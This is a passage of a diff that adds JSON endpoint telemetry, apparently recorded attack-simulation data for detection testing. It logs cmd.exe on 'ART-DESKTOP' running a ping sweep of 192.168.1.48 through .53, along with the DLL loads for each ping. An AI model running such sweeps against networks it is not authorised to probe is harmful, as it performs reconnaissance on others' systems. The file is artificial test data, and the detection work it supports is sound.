"{42FC7E13-CB64-5C05-0000-00104DE75101}" + }, + { + 
"event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 7264, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572207140000, + "unique_pid": "{42FC7E13-CB64-5C05-0000-00104DE75101}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 7264, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572207140000, + "unique_pid": "{42FC7E13-CB64-5C05-0000-00104DE75101}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 7264, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572207140000, + "unique_pid": "{42FC7E13-CB64-5C05-0000-00104DE75101}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 7264, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572207140000, + "unique_pid": "{42FC7E13-CB64-5C05-0000-00104DE75101}" + }, + { + "event_type": "image_load", + "image_name": "ws2_32.dll", + "image_path": "C:\\Windows\\System32\\ws2_32.dll", + "pid": 7264, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572207140000, + "unique_pid": "{42FC7E13-CB64-5C05-0000-00104DE75101}" + }, + { + "event_type": "image_load", + "image_name": "rpcrt4.dll", + "image_path": "C:\\Windows\\System32\\rpcrt4.dll", + "pid": 7264, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572207140000, + "unique_pid": "{42FC7E13-CB64-5C05-0000-00104DE75101}" + }, + { + "event_type": "image_load", + "image_name": "IPHLPAPI.DLL", + "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", + 
"pid": 7264, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572207140000, + "unique_pid": "{42FC7E13-CB64-5C05-0000-00104DE75101}" + }, + { + "event_type": "image_load", + "image_name": "winnsi.dll", + "image_path": "C:\\Windows\\System32\\winnsi.dll", + "pid": 7264, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572207140000, + "unique_pid": "{42FC7E13-CB64-5C05-0000-00104DE75101}" + }, + { + "event_type": "image_load", + "image_name": "nsi.dll", + "image_path": "C:\\Windows\\System32\\nsi.dll", + "pid": 7264, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572207140000, + "unique_pid": "{42FC7E13-CB64-5C05-0000-00104DE75101}" + }, + { + "event_type": "image_load", + "image_name": "mswsock.dll", + "image_path": "C:\\Windows\\System32\\mswsock.dll", + "pid": 7264, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572207140000, + "unique_pid": "{42FC7E13-CB64-5C05-0000-00104DE75101}" + }, + { + "event_type": "process", + "pid": 7264, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "terminate", + "timestamp": 131883572211840000, + "unique_pid": "{42FC7E13-CB64-5C05-0000-00104DE75101}" + }, + { + "command_line": "ping -n 1 -w 100 192.168.1.48", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "cmd.exe", + "parent_process_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 4136, + "ppid": 7328, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "create", + "timestamp": 131883572211980000, + "unique_pid": "{42FC7E13-CB65-5C05-0000-0010BEE95101}", + "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + 
"image_name": "PING.EXE", + "image_path": "C:\\Windows\\System32\\PING.EXE", + "pid": 4136, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572211990000, + "unique_pid": "{42FC7E13-CB65-5C05-0000-0010BEE95101}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 4136, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572211990000, + "unique_pid": "{42FC7E13-CB65-5C05-0000-0010BEE95101}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 4136, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572211990000, + "unique_pid": "{42FC7E13-CB65-5C05-0000-0010BEE95101}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 4136, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572211990000, + "unique_pid": "{42FC7E13-CB65-5C05-0000-0010BEE95101}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 4136, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572211990000, + "unique_pid": "{42FC7E13-CB65-5C05-0000-0010BEE95101}" + }, + { + "event_type": "image_load", + "image_name": "ws2_32.dll", + "image_path": "C:\\Windows\\System32\\ws2_32.dll", + "pid": 4136, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572211990000, + "unique_pid": "{42FC7E13-CB65-5C05-0000-0010BEE95101}" + }, + { + "event_type": "image_load", + "image_name": "IPHLPAPI.DLL", + "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", + "pid": 4136, + "process_name": 
"PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572211990000, + "unique_pid": "{42FC7E13-CB65-5C05-0000-0010BEE95101}" + }, + { + "event_type": "image_load", + "image_name": "rpcrt4.dll", + "image_path": "C:\\Windows\\System32\\rpcrt4.dll", + "pid": 4136, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572211990000, + "unique_pid": "{42FC7E13-CB65-5C05-0000-0010BEE95101}" + }, + { + "event_type": "image_load", + "image_name": "winnsi.dll", + "image_path": "C:\\Windows\\System32\\winnsi.dll", + "pid": 4136, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572211990000, + "unique_pid": "{42FC7E13-CB65-5C05-0000-0010BEE95101}" + }, + { + "event_type": "image_load", + "image_name": "nsi.dll", + "image_path": "C:\\Windows\\System32\\nsi.dll", + "pid": 4136, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572211990000, + "unique_pid": "{42FC7E13-CB65-5C05-0000-0010BEE95101}" + }, + { + "event_type": "image_load", + "image_name": "mswsock.dll", + "image_path": "C:\\Windows\\System32\\mswsock.dll", + "pid": 4136, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572211990000, + "unique_pid": "{42FC7E13-CB65-5C05-0000-0010BEE95101}" + }, + { + "event_type": "process", + "pid": 4136, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "terminate", + "timestamp": 131883572216830000, + "unique_pid": "{42FC7E13-CB65-5C05-0000-0010BEE95101}" + }, + { + "command_line": "ping -n 1 -w 100 192.168.1.49", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "cmd.exe", + "parent_process_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 3952, + "ppid": 7328, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "create", + 
"timestamp": 131883572216980000, + "unique_pid": "{42FC7E13-CB65-5C05-0000-001039EC5101}", + "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "PING.EXE", + "image_path": "C:\\Windows\\System32\\PING.EXE", + "pid": 3952, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572216980000, + "unique_pid": "{42FC7E13-CB65-5C05-0000-001039EC5101}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 3952, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572216980000, + "unique_pid": "{42FC7E13-CB65-5C05-0000-001039EC5101}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 3952, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572216980000, + "unique_pid": "{42FC7E13-CB65-5C05-0000-001039EC5101}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 3952, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572216980000, + "unique_pid": "{42FC7E13-CB65-5C05-0000-001039EC5101}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 3952, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572216980000, + "unique_pid": "{42FC7E13-CB65-5C05-0000-001039EC5101}" + }, + { + "event_type": "image_load", + "image_name": "ws2_32.dll", + "image_path": "C:\\Windows\\System32\\ws2_32.dll", + "pid": 3952, + "process_name": "PING.EXE", + "process_path": 
"C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572216980000, + "unique_pid": "{42FC7E13-CB65-5C05-0000-001039EC5101}" + }, + { + "event_type": "image_load", + "image_name": "rpcrt4.dll", + "image_path": "C:\\Windows\\System32\\rpcrt4.dll", + "pid": 3952, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572216980000, + "unique_pid": "{42FC7E13-CB65-5C05-0000-001039EC5101}" + }, + { + "event_type": "image_load", + "image_name": "IPHLPAPI.DLL", + "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", + "pid": 3952, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572216980000, + "unique_pid": "{42FC7E13-CB65-5C05-0000-001039EC5101}" + }, + { + "event_type": "image_load", + "image_name": "winnsi.dll", + "image_path": "C:\\Windows\\System32\\winnsi.dll", + "pid": 3952, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572216980000, + "unique_pid": "{42FC7E13-CB65-5C05-0000-001039EC5101}" + }, + { + "event_type": "image_load", + "image_name": "nsi.dll", + "image_path": "C:\\Windows\\System32\\nsi.dll", + "pid": 3952, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572216980000, + "unique_pid": "{42FC7E13-CB65-5C05-0000-001039EC5101}" + }, + { + "event_type": "image_load", + "image_name": "mswsock.dll", + "image_path": "C:\\Windows\\System32\\mswsock.dll", + "pid": 3952, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572216980000, + "unique_pid": "{42FC7E13-CB65-5C05-0000-001039EC5101}" + }, + { + "event_type": "process", + "pid": 3952, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "terminate", + "timestamp": 131883572221990000, + "unique_pid": "{42FC7E13-CB65-5C05-0000-001039EC5101}" + }, + { + "command_line": "ping -n 1 -w 100 192.168.1.50", 
+ "event_type": "process", + "logon_id": 217055, + "parent_process_name": "cmd.exe", + "parent_process_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 3824, + "ppid": 7328, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "create", + "timestamp": 131883572222140000, + "unique_pid": "{42FC7E13-CB66-5C05-0000-0010A8EE5101}", + "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "PING.EXE", + "image_path": "C:\\Windows\\System32\\PING.EXE", + "pid": 3824, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572222150000, + "unique_pid": "{42FC7E13-CB66-5C05-0000-0010A8EE5101}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 3824, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572222150000, + "unique_pid": "{42FC7E13-CB66-5C05-0000-0010A8EE5101}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 3824, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572222150000, + "unique_pid": "{42FC7E13-CB66-5C05-0000-0010A8EE5101}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 3824, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572222150000, + "unique_pid": "{42FC7E13-CB66-5C05-0000-0010A8EE5101}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 3824, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + 
"timestamp": 131883572222150000, + "unique_pid": "{42FC7E13-CB66-5C05-0000-0010A8EE5101}" + }, + { + "event_type": "image_load", + "image_name": "ws2_32.dll", + "image_path": "C:\\Windows\\System32\\ws2_32.dll", + "pid": 3824, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572222150000, + "unique_pid": "{42FC7E13-CB66-5C05-0000-0010A8EE5101}" + }, + { + "event_type": "image_load", + "image_name": "rpcrt4.dll", + "image_path": "C:\\Windows\\System32\\rpcrt4.dll", + "pid": 3824, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572222150000, + "unique_pid": "{42FC7E13-CB66-5C05-0000-0010A8EE5101}" + }, + { + "event_type": "image_load", + "image_name": "IPHLPAPI.DLL", + "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", + "pid": 3824, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572222150000, + "unique_pid": "{42FC7E13-CB66-5C05-0000-0010A8EE5101}" + }, + { + "event_type": "image_load", + "image_name": "winnsi.dll", + "image_path": "C:\\Windows\\System32\\winnsi.dll", + "pid": 3824, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572222150000, + "unique_pid": "{42FC7E13-CB66-5C05-0000-0010A8EE5101}" + }, + { + "event_type": "image_load", + "image_name": "nsi.dll", + "image_path": "C:\\Windows\\System32\\nsi.dll", + "pid": 3824, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572222150000, + "unique_pid": "{42FC7E13-CB66-5C05-0000-0010A8EE5101}" + }, + { + "event_type": "image_load", + "image_name": "mswsock.dll", + "image_path": "C:\\Windows\\System32\\mswsock.dll", + "pid": 3824, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572222150000, + "unique_pid": "{42FC7E13-CB66-5C05-0000-0010A8EE5101}" + }, + { + "event_type": "process", + 
"pid": 3824, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "terminate", + "timestamp": 131883572226830000, + "unique_pid": "{42FC7E13-CB66-5C05-0000-0010A8EE5101}" + }, + { + "command_line": "ping -n 1 -w 100 192.168.1.51", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "cmd.exe", + "parent_process_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 2284, + "ppid": 7328, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "create", + "timestamp": 131883572226980000, + "unique_pid": "{42FC7E13-CB66-5C05-0000-001026F15101}", + "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "PING.EXE", + "image_path": "C:\\Windows\\System32\\PING.EXE", + "pid": 2284, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572226980000, + "unique_pid": "{42FC7E13-CB66-5C05-0000-001026F15101}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 2284, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572226980000, + "unique_pid": "{42FC7E13-CB66-5C05-0000-001026F15101}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 2284, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572226980000, + "unique_pid": "{42FC7E13-CB66-5C05-0000-001026F15101}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 2284, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572226980000, + 
"unique_pid": "{42FC7E13-CB66-5C05-0000-001026F15101}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 2284, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572226980000, + "unique_pid": "{42FC7E13-CB66-5C05-0000-001026F15101}" + }, + { + "event_type": "image_load", + "image_name": "ws2_32.dll", + "image_path": "C:\\Windows\\System32\\ws2_32.dll", + "pid": 2284, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572226980000, + "unique_pid": "{42FC7E13-CB66-5C05-0000-001026F15101}" + }, + { + "event_type": "image_load", + "image_name": "rpcrt4.dll", + "image_path": "C:\\Windows\\System32\\rpcrt4.dll", + "pid": 2284, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572226980000, + "unique_pid": "{42FC7E13-CB66-5C05-0000-001026F15101}" + }, + { + "event_type": "image_load", + "image_name": "IPHLPAPI.DLL", + "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", + "pid": 2284, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572226980000, + "unique_pid": "{42FC7E13-CB66-5C05-0000-001026F15101}" + }, + { + "event_type": "image_load", + "image_name": "winnsi.dll", + "image_path": "C:\\Windows\\System32\\winnsi.dll", + "pid": 2284, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572226980000, + "unique_pid": "{42FC7E13-CB66-5C05-0000-001026F15101}" + }, + { + "event_type": "image_load", + "image_name": "nsi.dll", + "image_path": "C:\\Windows\\System32\\nsi.dll", + "pid": 2284, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572226980000, + "unique_pid": "{42FC7E13-CB66-5C05-0000-001026F15101}" + }, + { + "event_type": "image_load", + "image_name": "mswsock.dll", + 
"image_path": "C:\\Windows\\System32\\mswsock.dll", + "pid": 2284, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572226980000, + "unique_pid": "{42FC7E13-CB66-5C05-0000-001026F15101}" + }, + { + "event_type": "process", + "pid": 2284, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "terminate", + "timestamp": 131883572231830000, + "unique_pid": "{42FC7E13-CB66-5C05-0000-001026F15101}" + }, + { + "command_line": "ping -n 1 -w 100 192.168.1.52", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "cmd.exe", + "parent_process_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 6300, + "ppid": 7328, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "create", + "timestamp": 131883572231980000, + "unique_pid": "{42FC7E13-CB67-5C05-0000-001093F35101}", + "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "PING.EXE", + "image_path": "C:\\Windows\\System32\\PING.EXE", + "pid": 6300, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572231990000, + "unique_pid": "{42FC7E13-CB67-5C05-0000-001093F35101}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 6300, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572231990000, + "unique_pid": "{42FC7E13-CB67-5C05-0000-001093F35101}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 6300, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572231990000, + "unique_pid": 
"{42FC7E13-CB67-5C05-0000-001093F35101}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 6300, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572231990000, + "unique_pid": "{42FC7E13-CB67-5C05-0000-001093F35101}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 6300, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572231990000, + "unique_pid": "{42FC7E13-CB67-5C05-0000-001093F35101}" + }, + { + "event_type": "image_load", + "image_name": "ws2_32.dll", + "image_path": "C:\\Windows\\System32\\ws2_32.dll", + "pid": 6300, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572231990000, + "unique_pid": "{42FC7E13-CB67-5C05-0000-001093F35101}" + }, + { + "event_type": "image_load", + "image_name": "rpcrt4.dll", + "image_path": "C:\\Windows\\System32\\rpcrt4.dll", + "pid": 6300, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572231990000, + "unique_pid": "{42FC7E13-CB67-5C05-0000-001093F35101}" + }, + { + "event_type": "image_load", + "image_name": "IPHLPAPI.DLL", + "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", + "pid": 6300, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572231990000, + "unique_pid": "{42FC7E13-CB67-5C05-0000-001093F35101}" + }, + { + "event_type": "image_load", + "image_name": "winnsi.dll", + "image_path": "C:\\Windows\\System32\\winnsi.dll", + "pid": 6300, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572231990000, + "unique_pid": "{42FC7E13-CB67-5C05-0000-001093F35101}" + }, + { + "event_type": "image_load", + "image_name": "nsi.dll", + 
"image_path": "C:\\Windows\\System32\\nsi.dll", + "pid": 6300, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572231990000, + "unique_pid": "{42FC7E13-CB67-5C05-0000-001093F35101}" + }, + { + "event_type": "image_load", + "image_name": "mswsock.dll", + "image_path": "C:\\Windows\\System32\\mswsock.dll", + "pid": 6300, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572231990000, + "unique_pid": "{42FC7E13-CB67-5C05-0000-001093F35101}" + }, + { + "event_type": "process", + "pid": 6300, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "terminate", + "timestamp": 131883572236990000, + "unique_pid": "{42FC7E13-CB67-5C05-0000-001093F35101}" + }, + { + "command_line": "ping -n 1 -w 100 192.168.1.53", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "cmd.exe", + "parent_process_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 3380, + "ppid": 7328, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "create", + "timestamp": 131883572237140000, + "unique_pid": "{42FC7E13-CB67-5C05-0000-001011F65101}", + "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "PING.EXE", + "image_path": "C:\\Windows\\System32\\PING.EXE", + "pid": 3380, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572237140000, + "unique_pid": "{42FC7E13-CB67-5C05-0000-001011F65101}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 3380, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572237140000, + "unique_pid": "{42FC7E13-CB67-5C05-0000-001011F65101}" + 
}, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 3380, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572237140000, + "unique_pid": "{42FC7E13-CB67-5C05-0000-001011F65101}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 3380, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572237140000, + "unique_pid": "{42FC7E13-CB67-5C05-0000-001011F65101}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 3380, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572237140000, + "unique_pid": "{42FC7E13-CB67-5C05-0000-001011F65101}" + }, + { + "event_type": "image_load", + "image_name": "ws2_32.dll", + "image_path": "C:\\Windows\\System32\\ws2_32.dll", + "pid": 3380, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572237140000, + "unique_pid": "{42FC7E13-CB67-5C05-0000-001011F65101}" + }, + { + "event_type": "image_load", + "image_name": "rpcrt4.dll", + "image_path": "C:\\Windows\\System32\\rpcrt4.dll", + "pid": 3380, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572237140000, + "unique_pid": "{42FC7E13-CB67-5C05-0000-001011F65101}" + }, + { + "event_type": "image_load", + "image_name": "IPHLPAPI.DLL", + "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", + "pid": 3380, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572237140000, + "unique_pid": "{42FC7E13-CB67-5C05-0000-001011F65101}" + }, + { + "event_type": "image_load", + "image_name": "winnsi.dll", + "image_path": 
"C:\\Windows\\System32\\winnsi.dll", + "pid": 3380, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572237300000, + "unique_pid": "{42FC7E13-CB67-5C05-0000-001011F65101}" + }, + { + "event_type": "image_load", + "image_name": "nsi.dll", + "image_path": "C:\\Windows\\System32\\nsi.dll", + "pid": 3380, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572237300000, + "unique_pid": "{42FC7E13-CB67-5C05-0000-001011F65101}" + }, + { + "event_type": "image_load", + "image_name": "mswsock.dll", + "image_path": "C:\\Windows\\System32\\mswsock.dll", + "pid": 3380, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572237300000, + "unique_pid": "{42FC7E13-CB67-5C05-0000-001011F65101}" + }, + { + "event_type": "process", + "pid": 3380, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "terminate", + "timestamp": 131883572241830000, + 